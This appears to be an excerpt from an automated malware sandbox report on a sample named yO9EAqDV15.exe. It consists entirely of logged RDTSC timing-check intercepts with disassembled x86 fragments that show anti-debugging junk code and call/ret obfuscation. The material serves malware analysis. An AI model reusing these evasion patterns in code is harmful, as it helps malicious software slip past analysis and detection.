              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED243A second address: ED2447 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7F08F64186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED1507 second address: ED150B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED3633 second address: ED3637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED546C second address: ED5472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED647E second address: ED6495 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F08F64193h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED3637 second address: ED363B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED6495 second address: ED6533 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7F08F64186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F7F08F6418Ah 0x00000012 nop 0x00000013 mov di, 53A7h 0x00000017 push dword ptr fs:[00000000h] 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007F7F08F64188h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 00000018h 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 sub dword ptr [ebp+122D2BC3h], ebx 0x0000003e mov dword ptr fs:[00000000h], esp 0x00000045 mov ebx, dword ptr [ebp+122D1D91h] 0x0000004b mov eax, dword ptr [ebp+122D1301h] 0x00000051 jmp 00007F7F08F64193h 0x00000056 push FFFFFFFFh 0x00000058 push 00000000h 0x0000005a push ebp 0x0000005b call 00007F7F08F64188h 0x00000060 pop ebp 0x00000061 mov dword ptr [esp+04h], ebp 0x00000065 add dword ptr [esp+04h], 0000001Bh 0x0000006d inc ebp 0x0000006e push ebp 0x0000006f ret 0x00000070 pop ebp 0x00000071 ret 0x00000072 nop 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 jne 00007F7F08F64186h 0x0000007c rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED6533 second address: ED654C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7F08BA1E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F7F08BA1E38h 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 push eax 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED04A0 second address: ED04A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED04A4 second address: ED04A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EE0EB7 second address: EE0EBC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EE0EBC second address: EE0ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EE0ECB second address: EE0EE3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jc 00007F7F08F64186h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007F7F08F6418Ch 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EE0EE3 second address: EE0EED instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EE0EED second address: EE0EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EE076F second address: EE078B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7F08BA1E3Ch 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EE08EB second address: EE08EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EE0A3A second address: EE0A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7F08BA1E3Ch 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EE0A4A second address: EE0A7C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop edx 0x00000008 jmp 00007F7F08F6418Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 jmp 00007F7F08F64193h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EE0A7C second address: EE0A92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F7F08BA1E36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007F7F08BA1E3Ah 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EE0A92 second address: EE0A98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EE4226 second address: EE422B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EE422B second address: EE426C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b jl 00007F7F08F64188h 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 jmp 00007F7F08F6418Bh 0x0000001d mov eax, dword ptr [eax] 0x0000001f push ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F7F08F64199h 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EEABB1 second address: EEABB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EEABB5 second address: EEABD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08F6418Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F7F08F6418Fh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EEABD7 second address: EEAC11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E3Fh 0x00000007 jmp 00007F7F08BA1E41h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jno 00007F7F08BA1E36h 0x0000001e jno 00007F7F08BA1E36h 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EEAC11 second address: EEAC15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EEAC15 second address: EEAC1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EEAC1D second address: EEAC22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EEAE09 second address: EEAE1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E3Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EEB0C2 second address: EEB0C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EEB0C6 second address: EEB0CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EEB0CA second address: EEB0E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F7F08F64193h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E7097F second address: E7099D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F08BA1E46h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E7099D second address: E709B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F7F08F6418Eh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E709B6 second address: E709BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EF30F8 second address: EF3104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F7F08F64188h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E6B8D7 second address: E6B8DC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E6B8DC second address: E6B8EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F7F08F64186h 0x0000000a pop esi 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EF8DB3 second address: EF8DD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E46h 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F7F08BA1E36h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EF7ACE second address: EF7AD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EF7AD2 second address: EF7AE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F7F08BA1E36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EF7CB2 second address: EF7CB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EF7CB7 second address: EF7CEA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7F08BA1E3Ch 0x00000008 jne 00007F7F08BA1E36h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7F08BA1E49h 0x00000015 jmp 00007F7F08BA1E3Ah 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EF8675 second address: EF8692 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7F08F64186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007F7F08F64191h 0x00000010 pop esi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EF8692 second address: EF869C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7F08BA1E42h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EF869C second address: EF86A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EF86A2 second address: EF86AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EFD425 second address: EFD431 instructions: 0x00000000 rdtsc 0x00000002 je 00007F7F08F64186h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EFD431 second address: EFD437 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EC35DF second address: EC365C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7F08F64193h 0x00000008 jmp 00007F7F08F6418Fh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 pushad 0x00000013 jc 00007F7F08F64186h 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b popad 0x0000001c push eax 0x0000001d jo 00007F7F08F64186h 0x00000023 pop eax 0x00000024 popad 0x00000025 nop 0x00000026 push ebx 0x00000027 xor dword ptr [ebp+122D1EECh], edx 0x0000002d pop edx 0x0000002e lea eax, dword ptr [ebp+1248E32Bh] 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007F7F08F64188h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 00000014h 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e sub dword ptr [ebp+122D2C2Eh], ecx 0x00000054 push eax 0x00000055 jnl 00007F7F08F64192h 0x0000005b jnl 00007F7F08F6418Ch 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EC3838 second address: EC3842 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7F08BA1E3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EC41DA second address: EC41E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EC41E0 second address: EC41E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EC470E second address: EC4718 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7F08F64186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EC4718 second address: EC471D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EC48DF second address: EC490A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F7F08F64194h 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 jg 00007F7F08F64188h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EC490A second address: EC490F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EC4A12 second address: EC4A77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F7F08F64188h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 call 00007F7F08F6418Bh 0x00000027 add dword ptr [ebp+122D3553h], edx 0x0000002d pop edi 0x0000002e lea eax, dword ptr [ebp+1248E32Bh] 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007F7F08F64188h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e mov edi, dword ptr [ebp+122D3651h] 0x00000054 nop 0x00000055 push esi 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 popad 0x0000005a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EC4A77 second address: EC4A89 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7F08BA1E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EC4A89 second address: EA194A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08F6418Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+122D2BCDh], edi 0x00000010 movzx edi, dx 0x00000013 call dword ptr [ebp+122D299Bh] 0x00000019 push eax 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d jl 00007F7F08F64186h 0x00000023 pushad 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EFD6EE second address: EFD70E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F7F08BA1E36h 0x0000000a popad 0x0000000b js 00007F7F08BA1E49h 0x00000011 jmp 00007F7F08BA1E3Dh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EC3B09 second address: EC3B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EFD9EC second address: EFD9F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EFDD01 second address: EFDD12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jp 00007F7F08F64186h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EFE051 second address: EFE07F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7F08BA1E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F7F08BA1E46h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7F08BA1E3Ah 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EFE07F second address: EFE083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F02D0A second address: F02D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F08BA1E44h 0x00000009 pop ebx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F02D23 second address: F02D36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08F6418Ch 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F02FA8 second address: F02FAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F02FAE second address: F02FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F7F08F64196h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F02FCB second address: F02FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F03133 second address: F03139 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F0368D second address: F03692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F03692 second address: F03697 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F03AB9 second address: F03AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edi 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F0764F second address: F07658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F0A794 second address: F0A7AD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7F08BA1E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jc 00007F7F08BA1E36h 0x00000011 pushad 0x00000012 popad 0x00000013 pop edi 0x00000014 pop edi 0x00000015 push edx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F0A1C7 second address: F0A1CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F0A1CF second address: F0A1E2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7F08BA1E3Eh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F0A1E2 second address: F0A1EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F1048D second address: F104AA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7F08BA1E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7F08BA1E3Fh 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F104AA second address: F104AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F0F7DD second address: F0F7F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E44h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F0F7F9 second address: F0F7FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F0F7FD second address: F0F801 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
